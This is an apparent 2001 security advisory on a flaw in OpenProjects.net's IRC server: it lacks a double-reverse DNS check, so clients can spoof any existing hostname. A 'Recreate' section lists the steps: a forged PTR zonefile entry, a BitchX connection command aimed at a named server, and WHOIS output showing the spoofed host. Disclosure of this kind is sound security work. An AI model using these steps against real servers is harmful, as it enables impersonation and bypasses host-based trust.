|
|
|
|
| |
| OpenProjects.net's ircd suffers from a security vulnerability due to lack of a proper double-reverse DNS lookup. This allows attackers to spoof any hostname that actually exists on the internet. |
| |
Credit:
The information has been provided by Jukka Mutex, chrisj at newgold.net and Joseph Mallett.
|
| |
Vulnerable systems:
OpenProjects u2.10.05.18.(ipcheck4-5)
Recreate:
1. Choose a Hostname to Spoof. It is important to keep in mind that you must choose a hostname that actually exists, for our example we will use 'host.example.com'
2. Point Your Reverse Lookup To The Hostname. For our example, we will put the following in our BIND zonefile: 1.2.3.4.in-addr.arpa. IN PTR host.example.com.
Where we will assume you are using the same IP I used, 1.2.3.4.
3. Connect To A Vulnerable IRC Server. BitchX -H 1.2.3.4 jmutex asimov.openprojects.net
Try a WHOIS on yourself.
/whois jmutex
jmutex (jmutex@ host.example.com)
ircname : Jukka Mutex
server : asimov.openprojects.net (Fremont, CA)
idle : 0 hours 0 mins 24 secs (signon: Tue Oct 9 05:32:16 2001)
|
|
|
|
|
|
|
|
|
|
